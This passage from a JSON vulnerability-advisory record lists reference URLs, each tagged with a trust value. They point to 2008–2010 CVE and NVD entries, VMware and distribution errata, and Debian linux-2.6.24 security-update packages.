        "url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=b45c6e76bc2c72f6426c14bed64fdcbc9bf37cb0"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2010:0146"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/894-1/"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-3556"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-0086"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0085"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-1086"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0730"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-1088"
      },
      {
        "trust": 0.1,
        "url": "http://kb.vmware.com/kb/1027919"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-2939"
      },
      {
        "trust": 0.1,
        "url": "http://kb.vmware.com/kb/1055"
      },
      {
        "trust": 0.1,
        "url": "http://downloads.vmware.com/support/vsphere4/doc/vsp_esxi41_u1_rel_notes.html"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-3571"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0095"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0307"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0092"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0093"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3555"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3548"
      },
      {
        "trust": 0.1,
        "url": "http://kb.vmware.com/kb/1031330"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-3554"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-3562"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0088"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0084"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0091"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0089"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-3557"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-3550"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-0085"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-1384"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-3567"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0838"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2008-0086"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0837"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-3553"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-0106"
      },
      {
        "trust": 0.1,
        "url": "http://www.vmware.com/support/policies/eos_vi.html"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-2227"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2008-0107"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-2902"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-2901"
      },
      {
        "trust": 0.1,
        "url": "http://downloads.vmware.com/support/vsphere4/doc/vsp_esx41_u1_rel_notes.html"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-1085"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0091"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0841"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0840"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0291"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-2248"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0415"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-3561"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-3541"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-3559"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-3565"
      },
      {
        "trust": 0.1,
        "url": "http://kb.vmware.com/kb/1027904"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-0107"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0093"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0433"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0842"
      },
      {
        "trust": 0.1,
        "url": "http://www.vmware.com/support/policies/eos.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0082"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-3574"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0886"
      },
      {
        "trust": 0.1,
        "url": "http://downloads.vmware.com/d/info/datacenter_downloads/vmware_vsphere_4/4_0"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0734"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-1157"
      },
      {
        "trust": 0.1,
        "url": "http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0094"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0007"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0850"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-2524"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0839"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-1087"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0622"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0090"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2008-3825"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-3573"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-1084"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2008-5416"
      },
      {
        "trust": 0.1,
        "url": "http://www.vmware.com/security/advisories"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-1384"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0008"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0088"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0849"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-2070"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-4308"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-3549"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-3548"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-2693"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-3568"
      },
      {
        "trust": 0.1,
        "url": "http://www.vmware.com/support/policies/security_response.html"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0084"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-5416"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-3864"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-3825"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0410"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-1321"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-3572"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0092"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-1437"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3555"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0094"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-3566"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0847"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0740"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0082"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0437"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0844"
      },
      {
        "trust": 0.1,
        "url": "http://downloads.vmware.com/support/pubs/vs_pages/vsp_pubs_esx41_vc41.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3548"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-2066"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0089"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-2902"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0087"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0087"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-1436"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-2693"
      },
      {
        "trust": 0.1,
        "url": "http://kb.vmware.com/kb/1029353"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2008-0085"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0846"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-2226"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-1173"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0008"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-1641"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-2928"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2008-0106"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0845"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0848"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0095"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-1187"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-2521"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-3569"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0085"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0090"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-2901"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-3081"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-3551"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0843"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-arm_2.6.24-6~etchnhalf.9etch3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-mckinley_2.6.24-6~etchnhalf.9etch3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-686-bigmem_2.6.24-6~etchnhalf.9etch3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-2691"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-4kc-malta_2.6.24-6~etchnhalf.9etch3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-4kc-malta_2.6.24-6~etchnhalf.9etch3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-manual-2.6.24_2.6.24-6~etchnhalf.9etch3_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sb1-bcm91250a_2.6.24-6~etchnhalf.9etch3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-486_2.6.24-6~etchnhalf.9etch3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-alpha-generic_2.6.24-6~etchnhalf.9etch3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sparc64_2.6.24-6~etchnhalf.9etch3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-powerpc-smp_2.6.24-6~etchnhalf.9etch3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-amd64_2.6.24-6~etchnhalf.9etch3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-r5k-cobalt_2.6.24-6~etchnhalf.9etch3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-support-2.6.24-etchnhalf.1_2.6.24-6~etchnhalf.9etch3_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-sparc_2.6.24-6~etchnhalf.9etch3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-powerpc_2.6.24-6~etchnhalf.9etch3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3080"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-i386_2.6.24-6~etchnhalf.9etch3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-alpha-smp_2.6.24-6~etchnhalf.9etch3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3889"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-parisc_2.6.24-6~etchnhalf.9etch3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-parisc64-smp_2.6.24-6~etchnhalf.9etch3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-5kc-malta_2.6.24-6~etchnhalf.9etch3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-4005"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-s390_2.6.24-6~etchnhalf.9etch3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-iop32x_2.6.24-6~etchnhalf.9etch3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-mips_2.6.24-6~etchnhalf.9etch3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-r4k-ip22_2.6.24-6~etchnhalf.9etch3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-parisc-smp_2.6.24-6~etchnhalf.9etch3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-source-2.6.24_2.6.24-6~etchnhalf.9etch3_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-s390_2.6.24-6~etchnhalf.9etch3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-alpha_2.6.24-6~etchnhalf.9etch3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-parisc_2.6.24-6~etchnhalf.9etch3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-parisc64-smp_2.6.24-6~etchnhalf.9etch3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-r5k-ip32_2.6.24-6~etchnhalf.9etch3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-2.6.24_2.6.24-6~etchnhalf.9etch3.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-alpha-legacy_2.6.24-6~etchnhalf.9etch3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-r5k-cobalt_2.6.24-6~etchnhalf.9etch3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-footbridge_2.6.24-6~etchnhalf.9etch3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-mipsel_2.6.24-6~etchnhalf.9etch3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sparc64-smp_2.6.24-6~etchnhalf.9etch3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-2695"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-patch-debian-2.6.24_2.6.24-6~etchnhalf.9etch3_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sb1-bcm91250a_2.6.24-6~etchnhalf.9etch3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-5kc-malta_2.6.24-6~etchnhalf.9etch3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-powerpc-miboot_2.6.24-6~etchnhalf.9etch3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-s390_2.6.24-6~etchnhalf.9etch3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-footbridge_2.6.24-6~etchnhalf.9etch3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-s390x_2.6.24-6~etchnhalf.9etch3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sparc64-smp_2.6.24-6~etchnhalf.9etch3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-2.6.24_2.6.24-6~etchnhalf.9etch3.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-powerpc64_2.6.24-6~etchnhalf.9etch3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-parisc64_2.6.24-6~etchnhalf.9etch3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-tree-2.6.24_2.6.24-6~etchnhalf.9etch3_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sparc64_2.6.24-6~etchnhalf.9etch3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-5kc-malta_2.6.24-6~etchnhalf.9etch3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-s390x_2.6.24-6~etchnhalf.9etch3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-powerpc_2.6.24-6~etchnhalf.9etch3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_alpha.deb"
      },
      {
        "trust": 0.1,
